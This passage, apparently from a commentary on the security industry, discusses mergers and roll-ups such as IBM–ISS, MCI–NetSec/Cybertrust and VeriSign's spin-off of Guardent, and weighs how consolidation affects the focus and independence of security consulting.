With improved market conditions, the IBM purchase of ISS and the MCI purchase of NetSec, with the subsequent consolidation into Cybertrust, fall into a third stage. The outcome of these appears to have been OK, but, as with all mergers, there was some misalignment. As we’re now seeing, Guardent and the related MSS group are being spun off from VeriSign. This stage now includes the roll-up of security assessment product companies like Sanctum, SPI Dynamics, and Ounce by major technology integrators. Other real and rumored roll-ups include mid-sized VARs like Fishnet and Accuvant purchasing similar companies.

With the VeriSign consulting announcement, we are seeing the continued consolidation of the market. There will likely be more acquisitions, and it will affect the security market and its consumers in good and bad ways. On the positive side, the industry does not yet have a focused leader with a consolidated offering. Symantec and McAfee tried to play this role, but they appear to have given up on it. IBM may have the offering, but since they offer so much else, I wouldn’t call them the security industry leader.

The current trend of carriers and major technology players getting into the space means larger and more consolidated security offerings. The lack of focus may limit the ability of these large firms to continue to offer boutique-oriented services. Additionally, roll-ups that combine security with other offerings introduce a lack of independence. This is a huge issue that doesn’t get discussed much, but it’s one that no firm has truly overcome. It will be interesting to see how the remainder of the product companies fit into this stage. nCircle and Fortify are organizations to watch in this regard. It will also be interesting to see how successful the carriers like AT&T and the major tech players like IBM and HP are at integrating security consulting into their organizations.

